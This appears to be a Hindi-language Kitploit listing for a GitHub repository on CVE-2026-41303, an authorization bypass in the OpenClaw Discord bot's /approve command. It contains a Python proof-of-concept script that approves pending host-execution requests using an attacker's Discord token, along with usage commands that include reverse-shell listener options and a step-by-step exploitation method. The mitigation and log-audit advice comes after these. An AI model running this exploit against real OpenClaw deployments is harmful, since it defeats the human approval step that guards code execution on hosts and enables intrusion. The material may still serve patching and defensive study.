Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/kaleth4/cve-2026-41303
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षाचयनित संसाधन
GitHubkaleth4/cve-2026-41303

CVE-2026-41303

# CVE-2026-41303 के लिए तकनीकी दस्तावेज़ीकरण और प्रूफ-ऑफ-कॉन्सेप्ट OpenClaw Discord बॉट में प्राधिकरण बाईपास (authorization bypass) हेतु तकनीकी दस्तावेज़ीकरण और प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें शोषण पद्धति, शमन चरण, और रक्षात्मक अनुशंसाएँ शामिल हैं।

रिपॉजिटरी देखें
125 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔐 CVE-2026-41303: OpenClaw Discord Bot में Authorization Bypass

CVSS Badge
Status
Affected
Platform

OpenClaw में प्राधिकरण उल्लंघन (authorization bypass) भेद्यता पर पूर्ण तकनीकी दस्तावेज़


📋 विषय-सूची

  • सामान्य विवरण
  • तकनीकी विवरण
  • सुरक्षा प्रभाव
  • Proof of Concept
  • शोषण पद्धति
  • शमन और समाधान
  • रक्षा अनुशंसाएँ
  • संदर्भ
  • कानूनी अस्वीकरण

📝 सामान्य विवरण

इस रिपॉजिटरी में CVE-2026-41303 भेद्यता के बारे में तकनीकी जानकारी, विश्लेषण और अनुशंसाएँ शामिल हैं, जो OpenClaw प्रोजेक्ट में निष्पादन अनुमोदन कमांड में प्राधिकरण उल्लंघन (authorization bypass) की अनुमति देती है।

OpenClaw के 2026.3.28 से पहले के संस्करणों में एक गंभीर दोष की पहचान की गई है। समस्या Discord टेक्स्ट अनुमोदन कमांड में निहित है, जहाँ अधिकृत अनुमोदकों की सूची (channels.discord.execApprovals.approvers) में शामिल नहीं होने वाले उपयोगकर्ता लंबित होस्ट निष्पादन अनुरोधों को अनुमोदित कर सकते हैं।


🔍 तकनीकी विवरण

पैरामीटरमान
CVE IDCVE-2026-41303
प्रभावित उत्पादOpenClaw
भेद्यता प्रकारAuthorization Bypass (CWE-863)
हमला वेक्टरDiscord में टेक्स्ट कमांड
प्लेटफ़ॉर्मLinux / Discord
CVSS स्कोर8.8 (उच्च)
प्रभावित संस्करण< 2026.3.28
स्थितिv2026.3.28+ में सुधारा गया

🎯 तकनीकी विवरण

भेद्यता OpenClaw बॉट के /approve कमांड हैंडलर में प्राधिकरण सत्यापन की कमी में निहित है। सिस्टम अनुरोध को संसाधित करने से पहले यह ठीक से जाँच नहीं करता है कि कमांड निष्पादित करने वाला उपयोगकर्ता अधिकृत अनुमोदकों की सूची में है या नहीं।


⚠️ सुरक्षा प्रभाव

जिस Discord चैनल तक पहुँच रखने वाला हमलावर जहाँ अनुमोदन प्रबंधित किए जाते हैं, वह निम्न कार्य कर सकता है:

  • ✗ लंबित कोड निष्पादन अनुरोधों को इंटरसेप्ट करना
  • ✗ वैध अनुमोदक न होते हुए भी होस्ट पर मनमाने निष्पादन को अनुमोदित करना
  • ✗ OpenClaw चलाने वाले इंफ्रास्ट्रक्चर पर अनधिकृत कोड निष्पादन प्राप्त करना
  • ✗ सिस्टम की अखंडता और उपलब्धता से समझौता करना

हमला परिदृश्य

अनधिकृत उपयोगकर्ता
        ↓
Discord चैनल तक पहुँच
        ↓
लंबित अनुमोदन ID की पहचान
        ↓
/approve कमांड निष्पादित करता है
        ↓
बॉट अनुमतियों की जाँच किए बिना अनुमोदन करता है
        ↓
रिमोट कोड निष्पादन (RCE)

💻 Proof of Concept

निष्पादन के लिए आवश्यकताएँ

  • ✓ OpenClaw संचालित चैनल तक पहुँच वाला Discord उपयोगकर्ता टोकन
  • ✓ Discord चैनल का ID (channel-id)
  • ✓ लंबित अनुमोदन का ID (approval-id)
  • ✓ Python 3.8+
  • ✓ लाइब्रेरीज़: requests, json, argparse

पेशेवर PoC स्क्रिप्ट

import argparse
import requests
import json
import time

def main():
    # ऑडिट के लिए पेशेवर तर्क कॉन्फ़िगरेशन
    parser = argparse.ArgumentParser(
        description="CVE-2026-41303 - OpenClaw में अनुमोदन बायपास",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
उपयोग के उदाहरण:
  python3 exploit.py http://target.com --token TOKEN --channel-id 123456 --approval-id ABC789
  python3 exploit.py http://target.com --token TOKEN --channel-id 123456 --approval-id ABC789 --decision allow-always
        """
    )
    
    parser.add_argument("target", help="बॉट इंस्टेंस या संदर्भ का URL")
    parser.add_argument("--token", required=True, help="हमलावर/ऑडिटर का Discord टोकन")
    parser.add_argument("--channel-id", required=True, help="Discord चैनल का ID")
    parser.add_argument("--approval-id", required=True, help="बायपास करने के लिए अनुमोदन का ID")
    parser.add_argument("--decision", default="allow-once", 
                       choices=["allow-once", "allow-always"],
                       help="अनुमोदन निर्णय का प्रकार (डिफ़ॉल्ट: allow-once)")
    
    # पोस्ट-एक्सप्लॉइटेशन के लिए अतिरिक्त पैरामीटर
    parser.add_argument("--lhost", help="यदि अनुमोदन RCE सक्रिय करता है तो reverse shell के लिए IP")
    parser.add_argument("--lport", help="सुनने का पोर्ट")
    parser.add_argument("--verbose", "-v", action="store_true", help="वर्बोज़ मोड")

    args = parser.parse_args()

    # शोषण तर्क
    print(f"[*] अनुमोदन के लिए बायपास शुरू: {args.approval_id}")
    print(f"[*] लक्ष्य चैनल: {args.channel_id}")
    print(f"[*] निर्णय: {args.decision}")
    
    if args.verbose:
        print(f"[DEBUG] टोकन: {args.token[:20]}...")
        print(f"[DEBUG] लक्ष्य: {args.target}")
    
    # दोषपूर्ण अनुरोध का निर्माण
    headers = {
        "Authorization": f"Bearer {args.token}",
        "Content-Type": "application/json"
    }
    
    payload = {
        "approval_id": args.approval_id,
        "decision": args.decision,
        "channel_id": args.channel_id
    }
    
    try:
        # अनुमति सत्यापन के बिना /approve कमांड भेजना
        response = requests.post(
            f"{args.target}/api/approve",
            headers=headers,
            json=payload,
            timeout=10
        )
        
        if response.status_code == 200:
            print(f"[+] बायपास सफल! अनुमोदन निष्पादित हुआ।")
            print(f"[+] प्रतिक्रिया: {response.json()}")
            
            if args.lhost and args.lport:
                print(f"[*] Reverse shell {args.lhost}:{args.lport} पर कॉन्फ़िगर किया गया")
        else:
            print(f"[-] त्रुटि: {response.status_code} - {response.text}")
            
    except Exception as e:
        print(f"[-] अपवाद: {str(e)}")

if __name__ == "__main__":
    main()

स्क्रिप्ट का उपयोग

# मूल उपयोग
python3 exploit.py http://target.com --token YOUR_TOKEN --channel-id 123456789 --approval-id ABC123

# वर्बोज़ मोड
python3 exploit.py http://target.com --token YOUR_TOKEN --channel-id 123456789 --approval-id ABC123 -v

# Reverse shell के साथ
python3 exploit.py http://target.com --token YOUR_TOKEN --channel-id 123456789 --approval-id ABC123 --lhost 192.168.1.100 --lport 4444

🎯 शोषण पद्धति

चरण 1: पहचान

1. उस Discord चैनल तक पहुँच प्राप्त करें जहाँ OpenClaw इंटरैक्ट करता है
2. लंबित अनुमोदन IDs की पहचान के लिए बॉट संदेशों की निगरानी करें
3. अनुमोदन अनुरोधों का सटीक प्रारूप कैप्चर करें
4. /approve कमांड की संरचना का दस्तावेज़ीकरण करें

चरण 2: इंजेक्शन

1. कैप्चर किए गए IDs के साथ PoC स्क्रिप्ट निष्पादित करें
2. पैरामीटर के साथ निर्णय (allow-once या allow-always) भेजें
3. बॉट उपयोगकर्ता अनुमतियों की जाँच किए बिना कमांड संसाधित करता है
4. अनुमोदन सफलतापूर्वक निष्पादित होता है

चरण 3: श्रृंखलन (वैकल्पिक)

यदि Discord में टेक्स्ट अनुमोदन सर्वर पर स्वचालित फ़ंक्शन सक्रिय करता है:
  ↓
कोड परिनियोजन
  ↓
रिमोट कोड निष्पादन (RCE)
  ↓
सिस्टम से पूर्ण समझौता

🛠️ शमन और समाधान

✅ अनुशंसित तत्काल कार्रवाइयाँ

1. OpenClaw अपडेट करें

# संस्करण 2026.3.28 या उच्चतर में अपडेट करें
pip install --upgrade openclaw>=2026.3.28

# या आधिकारिक रिपॉजिटरी से
git clone https://github.com/openclaw/openclaw.git
cd openclaw
git checkout v2026.3.28
pip install -e .

2. कॉन्फ़िगरेशन की समीक्षा करें

# channels.discord.execApprovals.approvers सत्यापित करें
# फ़ाइल: config.yaml

channels:
  discord:
    execApprovals:
      approvers:
        - "user_id_1"
        - "user_id_2"
        - "user_id_3"
      # ⚠️ सुनिश्चित करें कि केवल विश्वसनीय उपयोगकर्ता ही इस सूची में हों

3. लॉग ऑडिट

# हाल के निष्पादन रिकॉर्ड की समीक्षा करें
tail -f /var/log/openclaw/execution.log

# संदिग्ध अनुमोदन खोजें
grep "APPROVAL" /var/log/openclaw/execution.log | grep -v "AUTHORIZED_USER"

# पूर्ण ऑडिट
openclaw-audit --check-approvals --date-range "last-30-days"

📋 शमन चेकलिस्ट

टूल डाउनलोड करें